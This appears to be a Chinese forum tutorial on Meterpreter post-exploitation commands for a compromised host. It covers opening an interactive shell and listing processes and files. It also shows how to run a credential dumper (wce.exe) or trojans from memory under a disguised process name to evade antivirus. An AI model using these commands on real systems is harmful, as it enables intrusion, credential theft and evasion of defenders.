- 打卡等级:热心大叔
- 打卡总天数:186
- 打卡月天数:9
- 打卡总奖励:184
- 最近打卡:2025-05-09 15:00:47
|
sysinfo
命令为显示远程主机的系统信息、结构、语言等新。
execute
在目标主机上执行一个命令,其中“execute -h”显示帮助信息。-f为执行要运行的命令。
我们运行运行目标主机上的记事本程序 execute -f notepad.exe
execute -i -f cmd.exe可以达到的效果跟使用shell命令一样了,内容会回显过来,可以直接输入cmd命令了。
在目标主机内存中直接执行我们攻击主机上的攻击程序,比如wce.exe,又比如木马等,这样可以避免攻击程序存储到目标主机硬盘上被发现或被查杀。
execute -H -m -d notepad.exe-f wce.exe -a "-o wce.txt"
-d 在目标主机执行时显示的进程名称(用以伪装)
-m 直接从内存中执行
"-o wce.txt"是wce.exe的运行参数
ps
显示目标计算机进程信息
idletime
显示目标机器截止到当前无操作命令的时间。
search
“search -f aa.exe” 查看目标机中在当前目录以及当前的子目录中有没有a.txt这个文件,有则显示出其路径。
“search –f l*.txt c:\\pp”为显示出c:\\pp下及pp文件夹下所有的子文件下所有以l开头的txt文件,若有此类文件,则返回其路径和其大小。
edit
调用vi编辑器,对目标主机上的文件进行修改
ipconfig/ifconfig
显示网络接口的关键信息,包括 IP 地址
|
|